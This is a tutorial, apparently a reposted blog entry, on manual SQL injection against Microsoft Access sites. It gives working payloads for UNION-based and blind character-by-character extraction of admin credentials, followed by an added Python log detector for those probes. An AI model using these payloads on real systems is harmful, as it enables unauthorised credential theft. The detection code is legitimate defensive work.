  • Manual SQL injection against Microsoft Access

    1. Determine the database type

    and exists (select * from msysobjects) >0

    and exists (select * from sysobjects) >0

    Normally the system table of Microsoft Access is msysobjects, which ordinary users cannot read by default, while the system table of Microsoft SQL Server is sysobjects, which users can read by default.

    If the back end is Microsoft SQL Server and the parameter is not filtered, the first request (msysobjects, which does not exist there) returns an error page and the second (sysobjects) returns a normal page; if the back end is Microsoft Access, both requests return error pages, since msysobjects is not readable and sysobjects does not exist.

    2. Database tables

    and exists (select * from admin)

    Checks whether a table named admin exists.

    3. Guess the username and password columns

    and exists (select password from admin)

    and exists (select admin from admin)

    If the page renders normally, the column exists. Password columns are commonly named adminpass, password and the like.

    4. Determine the number of columns

    order by 20        (test values one at a time)

    If the page renders normally, the table has at least that many columns.

    5. Dump the admin username and password with UNION SELECT

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
    Because ORDER BY showed 30 columns, the UNION SELECT is padded to 30 values in order to dump the admin user and password.

    The page echoes positions 3 and 5.
    Now change the query
    so that the username and password appear in those positions:

    union select 1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
    OK, the username and password are displayed.

    6. Determine the length of the username and password

    and (select len(admin) from admin)>6

    A normal page means the admin account name is longer than 6 characters.

    and (select len(admin) from admin)=7

    A normal page means the admin account name is exactly 7 characters.

    and (select len(passwd) from admin)>6

    and (select len(passwd) from admin)=7

    7. Determine each character by its ASCII code

    Character 1

    and (select top 1 asc(mid(admin,1,1)) from admin)>100

    A normal page means the code is greater than 100; an error page means it is not.

    and (select top 1 asc(mid(admin,1,1)) from admin)>50

    A normal page means the code is greater than 50.

    and (select top 1 asc(mid(admin,1,1)) from admin)=97

    A normal page means the code equals 97, which is the letter a.

    Character 2

    and (select top 1 asc(mid(admin,2,1)) from admin)>100

    A normal page means the code is greater than 100; an error page means it is not.

    Character 3

    and (select top 1 asc(mid(admin,3,1)) from admin)>100

    A normal page means the code is greater than 100; an error page means it is not.

    The same bisection is applied to the password column:

    and (select top 1 asc(mid(passwd,1,1)) from admin)>100

    A normal page means the code is greater than 100; an error page means it is not.

    and (select top 1 asc(mid(passwd,2,1)) from admin)>100

    A normal page means the code is greater than 100; an error page means it is not.

    and (select top 1 asc(mid(passwd,3,1)) from admin)>100

    A normal page means the code is greater than 100; an error page means it is not.


    8. Offset injection

    How offset injection works:
    1. A UNION query needs the same number of columns, in the same order, as the original query;
    2. select * from admin as a inner join admin as b on a.id=b.id aliases the admin table as a and also as b, joins on a.id being equal to b.id and returns every matching row; since a and b are the same table, every row is returned. If this is unclear, look up the join syntax.
    3. * stands for all columns: if the admin table you query has n columns, * stands for n columns.
    For example: if admin has 5 columns and union select 1,2,3,* from admin returns normally, the injected query has 8 columns.

    The statements look roughly like this:
    and 1=2 union select * from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id
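    Seen from the defending side, the probe sequence in steps 1 to 8 leaves a recognisable trail in the web server access log: each stage uses a distinct SQL fragment, and a single client walks through several of them in a row. The Python below is an added example, not code from the original post; it tags each logged request with the probe stage its query string matches and flags any client that has run two or more stages. The log lines, the path /item.asp and the IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
# One pattern per probe stage of the Access enumeration walk described above: msysobjects/sysobjects
# fingerprint, table guess, ORDER BY column count, UNION SELECT, LEN() oracle, ASC(MID()) oracle, offset join.
STAGES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("db_fingerprint", r"exists\s*\(\s*select\b[^)]*\bfrom\s+(?:msysobjects|sysobjects)\b"),
    ("table_guess",    r"exists\s*\(\s*select\b[^)]*\bfrom\s+(?!m?sysobjects\b)\w+\s*\)"),
    ("column_count",   r"\border\s+by\s+\d+"),
    ("union_extract",  r"\bunion\s+(?:all\s+)?select\b"),
    ("length_oracle",  r"\blen\s*\(\s*\w+\s*\).*?[<>=]\s*\d"),
    ("char_oracle",    r"\basc\s*\(\s*mid\s*\("),
    ("offset_join",    r"\binner\s+join\b.*?\bon\s+\w+\.id\s*=\s*\w+\.id"),
]]

# Constructed Combined Log Format lines; IPs come from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2016:10:01:02 +0800] "GET /item.asp?id=7 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2016:10:01:09 +0800] "GET /item.asp?id=7+and+exists+(select+*+from+msysobjects)+>0 HTTP/1.1" 500 1024',
    '203.0.113.7 - - [10/May/2016:10:01:15 +0800] "GET /item.asp?id=7+and+exists+(select+*+from+admin) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2016:10:01:22 +0800] "GET /item.asp?id=7+order+by+20 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2016:10:01:40 +0800] "GET /item.asp?id=7+union+select+1,2,username,4,password,6+from+admin HTTP/1.1" 200 5300',
    '203.0.113.7 - - [10/May/2016:10:02:01 +0800] "GET /item.asp?id=7+and+(select+len(admin)+from+admin)>6 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2016:10:02:09 +0800] "GET /item.asp?id=7+and+(select+top+1+asc(mid(admin,1,1))+from+admin)>100 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [10/May/2016:10:02:30 +0800] "GET /item.asp?id=42 HTTP/1.1" 200 4800',
]

# Client IP and request target of a Combined Log Format line.
REQ_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

def classify_request(url):
    """Names of the probe stages whose pattern matches the URL-decoded query string."""
    query = unquote_plus(url.split("?", 1)[1]) if "?" in url else ""
    return [name for name, rx in STAGES if rx.search(query)]

def scan_log(lines):
    """Map each client IP to the set of probe stages seen in its requests."""
    seen = {}
    for line in lines:
        m = REQ_RX.match(line)
        if m:
            ip, url = m.groups()
            tags = classify_request(url)
            if tags:
                seen.setdefault(ip, set()).update(tags)
    return seen

def flag_sources(seen, min_stages=2):
    """IPs that ran at least min_stages distinct probe stages (threshold is an assumption)."""
    return sorted(ip for ip, tags in seen.items() if len(tags) >= min_stages)
```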

  • Original source: https://www.cnblogs.com/nightnine/p/5475623.html